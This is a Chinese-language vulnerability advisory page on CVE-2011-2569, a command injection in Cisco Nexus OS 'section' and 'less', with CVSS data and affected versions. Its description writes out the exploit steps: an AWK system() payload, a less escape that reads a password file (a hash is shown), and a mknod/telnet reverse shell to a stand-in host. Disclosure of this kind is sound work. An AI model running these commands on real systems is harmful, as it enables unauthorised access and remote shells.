Cisco Nexus OS 'section'和'less'本地命令注入漏洞

admin 2023-12-08 17:12:24 Ali_nvd 来源:ZONE.CI 全球网 0 阅读模式
Cisco Nexus OS 'section'和'less'本地命令注入漏洞

CVE编号

CVE-2011-2569

利用情况

暂无

补丁情况

N/A

披露时间

2011-10-28
漏洞描述
Cisco Nexus系列交换机是数据中心级交换机。采用Cisco Nexus OS操作系统。section命令作为一个AWK脚本用于传递请求字符串,但是对输入缺少充分过滤,可在LINUX子系统上执行任意命令nx1# sh clock | sed 's/.*/BEGIN \{ system\(\"id"\) \}/' > 20110713.awk Warning: There is already a file existing with this name. Do you want to overwrite (yes/no)? [no] y nx1# sh clock | sec '* -f /bootflash/20110713.awk ' uid=2003(user) gid=504(network-operator) 11:16:04.082 UTC Wed Jul 13 2011 nx1# sh clock | sed 's/.*/BEGIN \{ system\(\"ls \/mnt\/cfg\/0\/"\) \}/' > 20110713.awk nx1# sh clock | sec '* -f /bootflash/20110713.awk ' ascii bin boot cfglabel.sysmgr debug licenses linux log lost+found 11:18:41.885 UTC Wed Jul 13 2011 可用于删除启动闪存中的任意文件或并发送'reboot'命令。另外less命令韩总,按冒号并按"e"键,指定要打开的文件路径,可查看任意系统文件:bin:*:1:1:bin:/bin: daemon:*:2:2:daemon:/usr/sbin: sys:*:3:3:sys:/dev: ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash ftpuser:UvdRSOzORvz9o:99:14:ftpuser:/var/ftp:/isanboot/bin/nobash nobody:*:65534:65534:nobody:/home:/bin/sh admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm 结合使用"|"(管道)然后按"$"宏键,可执行命令:!ls -lah > /bootflash/20110715也可以通过如下方法创建一个远程shell:mknod rs p; telnet ad.dr.es.s 8888 0<rs | /bin/bash 1>rs
解决建议
用户可联系供应商获得相应的补丁程序:http://www.cisco.com/
参考链接
http://tools.cisco.com/security/center/viewAlert.x?alertId=24458
受影响软件情况
# 类型 厂商 产品 版本 影响面
1
运行在以下环境
系统 cisco nx-os 4.2 -
运行在以下环境
系统 cisco nx-os 5.0 -
运行在以下环境
系统 cisco unified_computing_system_infrastructure_and_unified_computing_system_software 1.4(1j) -
运行在以下环境
系统 cisco unified_computing_system_infrastructure_and_unified_computing_system_software 2.0(1q) -
运行在以下环境
硬件 cisco unified_computing_system - -
CVSS3评分 6.8
  • 攻击路径 本地
  • 攻击复杂度 低
  • 权限要求 一次
  • 影响范围 N/A
  • 用户交互 无
  • 可用性 完全地
  • 保密性 完全地
  • 完整性 完全地
AV:L/AC:L/Au:S/C:C/I:C/A:C
CWE-ID 漏洞类型
CWE-264 权限、特权和访问控制
- avd.aliyun.com
weinxin
版权声明
本站原创文章转载请注明文章出处及链接,谢谢合作!